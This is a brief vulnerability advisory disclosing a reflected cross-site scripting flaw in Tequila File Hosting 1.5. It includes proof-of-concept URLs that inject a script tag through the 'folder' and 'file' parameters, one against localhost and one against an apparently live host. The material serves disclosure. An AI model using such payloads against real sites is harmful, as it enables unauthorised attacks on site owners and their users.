Tequila File Hosting 1.5 Cross Site Scripting
Posted on 16 December 2015
================================================================================ Tequila File Hosting Coss Site Scripting ================================================================================ # Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312 # Date: 16/12/2015 # Software Link: http://ehsansec.ir/apps/Tequila_v1.5-File_Hosting_Script.rar # Author: Ashiyane Digital Security Team # Verion: 1.5 # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/tequila-xss.txt ================================================================================ # Description: Tequila is a solid, safe, fast, simple and intuitive script which allows companies or individuals to upload, manage and share their files online. It is studied in every feature and was produced with attention to every detail. # PoC : http://localhost/files.php?folder="><script>alert('Ehsan')</script> http://easyhost.me/file.php?file="><script>alert('Ehsan')</script> ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================
